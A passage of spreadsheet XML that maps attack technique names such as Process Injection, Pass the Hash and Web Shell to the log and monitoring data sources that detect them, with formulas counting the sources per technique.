      </c>
      <c r="B56" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Windows Registry,File monitoring,DLL monitoring,Process monitoring,Named Pipes</v>
      </c>
      <c r="C56" s="8" t="s">
        <v>1136</v>
      </c>
      <c r="D56">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="E56">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="H56" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:B)</f>
        <v>Process Injection</v>
      </c>
    </row>
    <row r="57" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A57" s="11" t="s">
        <v>116</v>
      </c>
      <c r="B57" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Kernel drivers,Process monitoring,API monitoring</v>
      </c>
      <c r="C57" s="8" t="s">
        <v>1137</v>
      </c>
      <c r="D57">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E57">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="H57" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:B)</f>
        <v>Input Capture</v>
      </c>
    </row>
    <row r="58" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A58" s="11" t="s">
        <v>117</v>
      </c>
      <c r="B58" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C58" s="8" t="s">
        <v>1109</v>
      </c>
      <c r="D58">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E58">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="H58" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:B)</f>
        <v>Process Discovery</v>
      </c>
    </row>
    <row r="59" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A59" s="11" t="s">
        <v>118</v>
      </c>
      <c r="B59" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Services,Windows Registry</v>
      </c>
      <c r="C59" s="8" t="s">
        <v>1138</v>
      </c>
      <c r="D59">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E59">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H59" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:B)</f>
        <v>Service Registry Permissions Weakness</v>
      </c>
    </row>
    <row r="60" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A60" s="11" t="s">
        <v>119</v>
      </c>
      <c r="B60" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C60" s="8" t="s">
        <v>1129</v>
      </c>
      <c r="D60">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E60">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="H60" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:B)</f>
        <v>Command-Line Interface</v>
      </c>
    </row>
    <row r="61" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A61" s="11" t="s">
        <v>120</v>
      </c>
      <c r="B61" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring</v>
      </c>
      <c r="C61" s="8" t="s">
        <v>1139</v>
      </c>
      <c r="D61">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E61">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="H61" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:B)</f>
        <v>Registry Run Keys / Startup Folder</v>
      </c>
    </row>
    <row r="62" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A62" s="11" t="s">
        <v>121</v>
      </c>
      <c r="B62" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C62" s="8" t="s">
        <v>1137</v>
      </c>
      <c r="D62">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E62">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="H62" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:B)</f>
        <v>Graphical User Interface</v>
      </c>
    </row>
    <row r="63" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A63" s="11" t="s">
        <v>122</v>
      </c>
      <c r="B63" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:C)</f>
        <v>System calls</v>
      </c>
      <c r="C63" s="8">
        <v>100</v>
      </c>
      <c r="D63">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E63">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="H63" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:B)</f>
        <v>Hypervisor</v>
      </c>
    </row>
    <row r="64" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A64" s="11" t="s">
        <v>123</v>
      </c>
      <c r="B64" t="str">
        <f>LOOKUP(A64,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C64" s="8" t="s">
        <v>1141</v>
      </c>
      <c r="D64">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E64">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H64" t="str">
        <f>LOOKUP(A64,'REF-DataSources'!A:B)</f>
        <v>Security Software Discovery</v>
      </c>
    </row>
    <row r="65" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A65" s="11" t="s">
        <v>124</v>
      </c>
      <c r="B65" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C65" s="8" t="s">
        <v>1142</v>
      </c>
      <c r="D65">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E65">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H65" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
    </row>
    <row r="66" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A66" s="11" t="s">
        <v>125</v>
      </c>
      <c r="B66" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C66" s="8" t="s">
        <v>1135</v>
      </c>
      <c r="D66">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E66">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H66" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:B)</f>
        <v>Uncommonly Used Port</v>
      </c>
    </row>
    <row r="67" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A67" s="11" t="s">
        <v>126</v>
      </c>
      <c r="B67" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</v>
      </c>
      <c r="C67" s="8" t="s">
        <v>1114</v>
      </c>
      <c r="D67">
        <f t="shared" ref="D67:D130" si="3">LEN(TRIM(B67))-LEN(SUBSTITUTE(TRIM(B67),",",""))+1</f>
        <v>5</v>
      </c>
      <c r="E67">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="H67" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:B)</f>
        <v>Indicator Removal from Tools</v>
      </c>
    </row>
    <row r="68" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A68" s="11" t="s">
        <v>127</v>
      </c>
      <c r="B68" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:C)</f>
        <v>API monitoring,MBR,VBR</v>
      </c>
      <c r="C68" s="8" t="s">
        <v>1143</v>
      </c>
      <c r="D68">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E68">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H68" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:B)</f>
        <v>Bootkit</v>
      </c>
    </row>
    <row r="69" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A69" s="11" t="s">
        <v>128</v>
      </c>
      <c r="B69" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,Application logs</v>
      </c>
      <c r="C69" s="8" t="s">
        <v>1144</v>
      </c>
      <c r="D69">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E69">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H69" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Privilege Escalation</v>
      </c>
    </row>
    <row r="70" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A70" s="11" t="s">
        <v>129</v>
      </c>
      <c r="B70" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C70" s="8" t="s">
        <v>1119</v>
      </c>
      <c r="D70">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E70">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H70" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:B)</f>
        <v>Permission Groups Discovery</v>
      </c>
    </row>
    <row r="71" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A71" s="11" t="s">
        <v>130</v>
      </c>
      <c r="B71" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,API monitoring,Windows event logs</v>
      </c>
      <c r="C71" s="8" t="s">
        <v>1114</v>
      </c>
      <c r="D71">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E71">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="H71" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:B)</f>
        <v>Indicator Removal on Host</v>
      </c>
    </row>
    <row r="72" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A72" s="11" t="s">
        <v>131</v>
      </c>
      <c r="B72" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C72" s="8" t="s">
        <v>1145</v>
      </c>
      <c r="D72">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E72">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="H72" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:B)</f>
        <v>Standard Application Layer Protocol</v>
      </c>
    </row>
    <row r="73" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A73" s="11" t="s">
        <v>132</v>
      </c>
      <c r="B73" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</v>
      </c>
      <c r="C73" s="8" t="s">
        <v>1146</v>
      </c>
      <c r="D73">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E73">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="H73" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:B)</f>
        <v>Third-party Software</v>
      </c>
    </row>
    <row r="74" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A74" s="11" t="s">
        <v>133</v>
      </c>
      <c r="B74" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Loaded DLLs</v>
      </c>
      <c r="C74" s="8" t="s">
        <v>1138</v>
      </c>
      <c r="D74">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E74">
        <f t="shared" ref="E74:E137" si="4">LEN(TRIM(C74))-LEN(SUBSTITUTE(TRIM(C74),";",""))+1</f>
        <v>3</v>
      </c>
      <c r="H74" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:B)</f>
        <v>DLL Side-Loading</v>
      </c>
    </row>
    <row r="75" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A75" s="11" t="s">
        <v>134</v>
      </c>
      <c r="B75" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C75" s="8" t="s">
        <v>1112</v>
      </c>
      <c r="D75">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E75">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H75" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:B)</f>
        <v>Data Staged</v>
      </c>
    </row>
    <row r="76" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A76" s="11" t="s">
        <v>135</v>
      </c>
      <c r="B76" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C76" s="8">
        <v>100</v>
      </c>
      <c r="D76">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E76">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="H76" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:B)</f>
        <v>Pass the Hash</v>
      </c>
    </row>
    <row r="77" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A77" s="11" t="s">
        <v>136</v>
      </c>
      <c r="B77" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C77" s="8" t="s">
        <v>1135</v>
      </c>
      <c r="D77">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E77">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H77" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:B)</f>
        <v>Remote Desktop Protocol</v>
      </c>
    </row>
    <row r="78" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A78" s="11" t="s">
        <v>137</v>
      </c>
      <c r="B78" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Authentication logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C78" s="8" t="s">
        <v>1147</v>
      </c>
      <c r="D78">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E78">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H78" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:B)</f>
        <v>Windows Admin Shares</v>
      </c>
    </row>
    <row r="79" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A79" s="11" t="s">
        <v>138</v>
      </c>
      <c r="B79" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:C)</f>
        <v>AWS CloudTrail logs,Stackdriver logs,Authentication logs,Process monitoring</v>
      </c>
      <c r="C79" s="8" t="s">
        <v>1148</v>
      </c>
      <c r="D79">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E79">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="H79" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:B)</f>
        <v>Valid Accounts</v>
      </c>
    </row>
    <row r="80" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A80" s="11" t="s">
        <v>139</v>
      </c>
      <c r="B80" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C80" s="8" t="s">
        <v>1149</v>
      </c>
      <c r="D80">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E80">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H80" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:B)</f>
        <v>Multilayer Encryption</v>
      </c>
    </row>
    <row r="81" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A81" s="11" t="s">
        <v>140</v>
      </c>
      <c r="B81" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C81" s="8" t="s">
        <v>1148</v>
      </c>
      <c r="D81">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E81">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="H81" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:B)</f>
        <v>Taint Shared Content</v>
      </c>
    </row>
    <row r="82" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A82" s="11" t="s">
        <v>141</v>
      </c>
      <c r="B82" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters</v>
      </c>
      <c r="C82" s="8" t="s">
        <v>1133</v>
      </c>
      <c r="D82">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E82">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="H82" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:B)</f>
        <v>Credentials in Files</v>
      </c>
    </row>
    <row r="83" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A83" s="11" t="s">
        <v>142</v>
      </c>
      <c r="B83" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C83" s="8" t="s">
        <v>1109</v>
      </c>
      <c r="D83">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E83">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="H83" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:B)</f>
        <v>System Information Discovery</v>
      </c>
    </row>
    <row r="84" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A84" s="11" t="s">
        <v>143</v>
      </c>
      <c r="B84" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C84" s="8" t="s">
        <v>1112</v>
      </c>
      <c r="D84">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E84">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H84" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
    </row>
    <row r="85" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A85" s="11" t="s">
        <v>144</v>
      </c>
      <c r="B85" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:C)</f>
        <v>WMI Objects</v>
      </c>
      <c r="C85" s="8">
        <v>100</v>
      </c>
      <c r="D85">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E85">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="H85" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:B)</f>
        <v>Windows Management Instrumentation Event Subscription</v>
      </c>
    </row>
    <row r="86" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A86" s="11" t="s">
        <v>145</v>
      </c>
      <c r="B86" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C86" s="8" t="s">
        <v>1150</v>
      </c>
      <c r="D86">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E86">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H86" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:B)</f>
        <v>Rundll32</v>
      </c>
    </row>
    <row r="87" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A87" s="11" t="s">
        <v>146</v>
      </c>
      <c r="B87" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,Loaded DLLs,DLL monitoring,Windows Registry,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C87" s="8" t="s">
        <v>1151</v>
      </c>
      <c r="D87">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E87">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H87" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:B)</f>
        <v>PowerShell</v>
      </c>
    </row>
    <row r="88" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A88" s="11" t="s">
        <v>147</v>
      </c>
      <c r="B88" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C88" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D88">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E88">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H88" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:B)</f>
        <v>Account Discovery</v>
      </c>
    </row>
    <row r="89" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A89" s="11" t="s">
        <v>148</v>
      </c>
      <c r="B89" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:C)</f>
        <v>System calls,Process monitoring,Authentication logs,Process command-line parameters</v>
      </c>
      <c r="C89" s="8" t="s">
        <v>1152</v>
      </c>
      <c r="D89">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E89">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H89" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:B)</f>
        <v>Bypass User Account Control</v>
      </c>
    </row>
    <row r="90" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A90" s="11" t="s">
        <v>149</v>
      </c>
      <c r="B90" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Services,Windows Registry,Process command-line parameters,Anti-virus</v>
      </c>
      <c r="C90" s="8" t="s">
        <v>1153</v>
      </c>
      <c r="D90">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E90">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="H90" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:B)</f>
        <v>Disabling Security Tools</v>
      </c>
    </row>
    <row r="91" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A91" s="11" t="s">
        <v>150</v>
      </c>
      <c r="B91" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C91" s="8" t="s">
        <v>1154</v>
      </c>
      <c r="D91">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E91">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H91" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:B)</f>
        <v>Connection Proxy</v>
      </c>
    </row>
    <row r="92" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A92" s="11" t="s">
        <v>151</v>
      </c>
      <c r="B92" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C92" s="8" t="s">
        <v>67</v>
      </c>
      <c r="D92">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E92">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="H92" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:B)</f>
        <v>Replication Through Removable Media</v>
      </c>
    </row>
    <row r="93" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A93" s="11" t="s">
        <v>152</v>
      </c>
      <c r="B93" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C93" s="8" t="s">
        <v>67</v>
      </c>
      <c r="D93">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E93">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="H93" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:B)</f>
        <v>Communication Through Removable Media</v>
      </c>
    </row>
    <row r="94" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A94" s="11" t="s">
        <v>153</v>
      </c>
      <c r="B94" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,API monitoring</v>
      </c>
      <c r="C94" s="8" t="s">
        <v>67</v>
      </c>
      <c r="D94">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E94">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="H94" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:B)</f>
        <v>Process Hollowing</v>
      </c>
    </row>
    <row r="95" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A95" s="11" t="s">
        <v>154</v>
      </c>
      <c r="B95" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring,Host network interface,Network intrusion detection system,Network protocol analysis</v>
      </c>
      <c r="C95" s="8" t="s">
        <v>1155</v>
      </c>
      <c r="D95">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E95">
        <f t="shared" si="4"/>
        <v>7</v>
      </c>
      <c r="H95" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:B)</f>
        <v>Custom Command and Control Protocol</v>
      </c>
    </row>
    <row r="96" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A96" s="11" t="s">
        <v>155</v>
      </c>
      <c r="B96" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C96" s="8" t="s">
        <v>1156</v>
      </c>
      <c r="D96">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E96">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="H96" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:B)</f>
        <v>Standard Non-Application Layer Protocol</v>
      </c>
    </row>
    <row r="97" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A97" s="11" t="s">
        <v>156</v>
      </c>
      <c r="B97" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Kernel drivers,API monitoring,Process command-line parameters</v>
      </c>
      <c r="C97" s="8" t="s">
        <v>1157</v>
      </c>
      <c r="D97">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E97">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H97" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:B)</f>
        <v>NTFS File Attributes</v>
      </c>
    </row>
    <row r="98" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A98" s="11" t="s">
        <v>157</v>
      </c>
      <c r="B98" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C98" s="8">
        <v>100</v>
      </c>
      <c r="D98">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E98">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="H98" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:B)</f>
        <v>Pass the Ticket</v>
      </c>
    </row>
    <row r="99" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A99" s="11" t="s">
        <v>158</v>
      </c>
      <c r="B99" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,API monitoring,Windows event logs,Packet capture</v>
      </c>
      <c r="C99" s="8" t="s">
        <v>1130</v>
      </c>
      <c r="D99">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E99">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H99" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:B)</f>
        <v>Account Manipulation</v>
      </c>
    </row>
    <row r="100" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A100" s="11" t="s">
        <v>159</v>
      </c>
      <c r="B100" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C100" s="8" t="s">
        <v>1158</v>
      </c>
      <c r="D100">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E100">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H100" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:B)</f>
        <v>Timestomp</v>
      </c>
    </row>
    <row r="101" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A101" s="11" t="s">
        <v>160</v>
      </c>
      <c r="B101" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Authentication logs,File monitoring,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C101" s="8" t="s">
        <v>1114</v>
      </c>
      <c r="D101">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E101">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="H101" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:B)</f>
        <v>Web Shell</v>
      </c>
    </row>
    <row r="102" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A102" s="11" t="s">
        <v>161</v>
